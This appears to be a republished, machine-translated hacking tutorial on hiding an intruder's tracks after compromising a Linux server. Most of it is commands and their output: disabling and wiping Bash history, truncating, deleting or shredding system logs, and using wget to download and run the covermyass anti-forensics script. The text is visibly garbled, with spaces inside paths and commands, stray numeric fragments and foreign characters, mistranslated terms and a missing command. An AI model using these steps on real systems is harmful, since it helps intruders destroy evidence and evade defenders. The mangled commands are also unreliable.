The final stage of exploitation is covering your tracks, which means that all activities and logs are cleared so that the attacker can be prevented from being detected. It is especially crucial for perseverance if the target is to be approached again in the future.
To show you the basics of handling your tracks, we'll first compromise a target and then explore some techniques used to remove Bash history, clear logs and remain hidden after running a Linux -system.
Step 1: Compromising a Target
The first thing to do is exploit the target. We can use command injection to take advantage of the way the server processes OS commands to get a shell.
We will also want to upgrade our new shell to a fully interactive shell. Doing so makes it easier to work in general and we can also use tab completion and terminal history.
Then we can escalate our privileges so that we can take better advantage of the system to go unnoticed.
Step 2: Create an easy-to-delete hidden folder
Once we have root access, we can create a hidden folder to work out and store scripts or files. everyone except the most noobie admin, but another discretion layer certainly wouldn't hurt. First, let's locate all writable directories with the following command:
root @ target: / # find / -perm -222 -type d 2> / dev / null
/ dev / shm
/ var / lock
/ var / lib / php5
/ var / tmp
/ var / www / dav
/ var / www / twiki / data / Sandbox
/ var / www / twiki / data / Main
/ var / www / twiki / data / Know
/ var / www / twiki / data / TWiki
/ var / www / twiki / data / _default
/ var / www / twiki / data / Trash
/ var / www / twiki / pub / Sandbox
/ var / www / twiki / pub / Main
/ var / www / twiki / pub / Know
/ var / www / twiki / pub / Know / IncorrectDllVersionW32PTH10DLL
/ var / www / twiki / pub / TWiki
/ var / www / twiki / pub / TWiki / TWikiDocGraphics
/ var / www / twiki / pub / TWiki / TWikiTemplates
/ var / www / twiki / pub / TWiki / TWikiLogos
/ var / www / twiki / pub / TWiki / PreviewBackground
/ var / www / twiki / pub / TWiki / FileAttachment
/ var / www / twiki / pub / TWiki / WabiSabi
/ var / www / twiki / pub / Trash
/ var / www / twiki / pub / icn
/ tmp
/tmp/.ICE-unix
We can create a hidden directory with the command mkdir and prefix the name with a point: root @ target: / # mkdir / dev / shm / .secret
mention the contents of / dev / shm, nothing appears:
root @ target: / # ls -l / dev / shm /
total 0
Only when we use the switch -a to display all files and folders it will be displayed:
root @ target: / # ls -la / dev / shm /
total 0
drwxrwxrwt 3 root root 60 2019-06-19 13:49.
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x 2 root root 40 2019-06-19 13:49 .secret
And to delete the directory once we're done on the machine, use the rmdir command: [19659009] root @target: / # rmdir /dev/shm/.secret/"19659018 ة Step 3: Delete the Bash History
root @ target: / # history
1 cd /
2 ls
3 find / -perm -222 -type d 2> / dev / null
4 cd / dev / shm /
5 cd /
6 mkdir /dev/shm/.secret
7 ls -l / dev / shm /
8 ls -la / dev / shm /
9 ls
10 rmdir /dev/shm/.secret/
11 history
Commands are written to the HISTFILE environment variable, which is usually .bash_history. We can echo the to see the location:
root @ target: / # echo $ HISTFILE
We can use the unset command to remove the variable: root @ target: / # unset HISTFILE
So if we echo it again, nothing appears:
root @ target : / # echo $ HISTFILE
We can also make sure that the command history is not saved by sending it to / dev / null. Put the variable on it:
root @ target: / # HISTFILE = / dev / null
Or do the same with the export command:
root @ target: / # export HISTFILE = / dev / null [19659010] And the history is now being sent to / dev / null (nowhere): root @ target: / # echo $ HISTFILE
/ dev / null
We can set the number of commands to be saved during the current session to 0 using the variable HISTSIZE:
root @ target: / # HISTSIZE = 0
You can also use the export command use:
root @ target: / # export HISTSIZE = 0
We can also change the number of allowed lines in the history file with the variable HISTFILESIZE. Set this to 0:
root @ target: / # HISTFILESIZE = 0
Or with export:
root @ target: / # export HISTFILESIZE = 0
The command set can also be used to change shell options. Use the following command to disable the history option:
root @ target: / # set + o history
And to enable it again:
root @ target: / # set -o history [19659011Likewisethecommand shopt can be used to change shell options. Use the following command to disable history: root @ target: / # shopt -ou history
And to enable it again:
root @ target: / # shopt -os history
] While running commands on the target system we can sometimes avoid saving them in history by starting the command with a leading space:
root @ target: ~ # cat / etc / passwd
That technique does not always work and depends on the system.
We can also just clear history with the -c switch:
root @ target: ~ # history -c
To make the changes written to disk , use the -w switch:
root @ target: ~ # history -w
That will only clear history for the current session. To be absolutely sure that history is cleared when you close a session, the following command is useful:
root @ target: / # cat / dev / null> ~ / .bash_history && history -c && exit
We can also use the command kill to close the session without saving history:
root @ target: / # kill -9 $$
Step 4: clear the log files
In addition to Bash history, log files must also be cleared to go unnoticed. Here are some common log files and what they contain:
- /var/log/auth.log Authentication
- /var/log/cron.log Cron Jobs
- / var / log / maillog Mail
- / var / log / httpd Apache
Of course we can easily delete a log with the rm command:
root @ target: / # rm /var/log/auth.log"19659010] will likely cause red flags, so it's better to empty the file rather than completely delete it We can use the abbreviation command to reduce the size to 0: root @ target: / # truncate -s 0 /var/log/auth.logifte19659010"Note, truncation is not always present on all systems. We can achieve the same by echoing nothing in the file:
root @ target: / # echo & # 39; & # 39;> /var/log/auth.log%19659010span And also with > to empty the file itself: root @ target: / #> /var/log/auth.log%19659010 We can also send it to / dev / null: root @ target : / # cat / dev / null> /var/log/auth.log%19659010unette Or use the tee command: root @ target: / # true | tee /var/log/auth.logifte19659010 ة We can also use the dd command to write nothing to the log file:
root @ target: / # dd if = / dev / null from = / var / log / auth.log
0 + 0 records in
0 + 0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB / s
The command shred can be used to overwrite a file with meaningless binary data:
root @ target: / We can even tack on -zu which truncates the file and overwrites it with zeros to hide the evidence of fragmentation: root @ target: / # shred -zu / var / log / auth.log {19659018 // Step 5: Use a tool to get things erased To increase the chances of any activity on the target going undiscovered, we can use a tool to make sure ensure everything is erased. Covermyass is a script that will automate many of the processes we've already covered, including clearing log files and disabling Bash history.
We can get the script from GitHub with wget (assuming we can access the internet on the target, otherwise it must be manually transferred):
root @ target: / # wget https : //raw.githubusercontent.com/sundowndev/covermyass/master/covermyass "19659010] Go to a writable folder and use chmod to make it executable: root @ target: / tmp # chmod + x covermyass
Then we can run it:
root @ target: / tmp # ./covermyass
Welcome to Cover my ass tool!
Choose an option :
1) Clear logs for the user's root
2) Permanently disable the authentication and bash history
3) Restore settings to default
99) Closing tool
>
We get a custom prompt with a few options to choose from. Let's select the first one to clear the logs:
> 1
[+] / var / log / messages cleaned up.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] / var / log / wtmp cleaned.
[+] ~ / .bash_history cleaned up.
[+] History file deleted.
Reminder: You have to reload the session to see effects.
Type exit to do this.
We can also disable Bash and Auth history with option 2:
> 2
[+] Permanently send /var/log/auth.log to / dev / null
[+] Permanently send bash_history to / dev / null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Library for disabled history
Bash log disabled permanently.
And in case you need to erase everything quickly, add now to the command:
root @ target: / tmp # ./covermyass now
[+] / var / log / messages cleaned up.
[+] /var/log/kern.log cleaned.
[+] / var / log / wtmp cleaned.
[+] ~ / .bash_history cleaned up.
[+] History file deleted.
Reminder: You have to reload the session to see effects.
Type exit to do this
Wrapping Up
Today we explored different techniques used to cover tracks and go unnoticed on a compromised machine. We discussed ways to disable and delete Bash history, methods to clear log files and used the Covermyass tool to ensure that our activity on the target was cleared. There are other ways to clear certain traces of an attack, such as with Metasploit, with shell scripting or with a hacked Windows machine, but the above should be all you need for a standard Linux machine.
Don't Miss: How Hackers Hide Their Traces on an Exploited Linux Server with Shell Scripting
Want to Make Money as a White Hat Hacker? Start your White-Hat Hacking career with our Premium Ethical 2020 Hacking Certification Training Bundle from the new Null Byte Shop and receive over 60 hours of training from Ethical Hacking Professionals.
Buy Now (96% Off)>
Source link
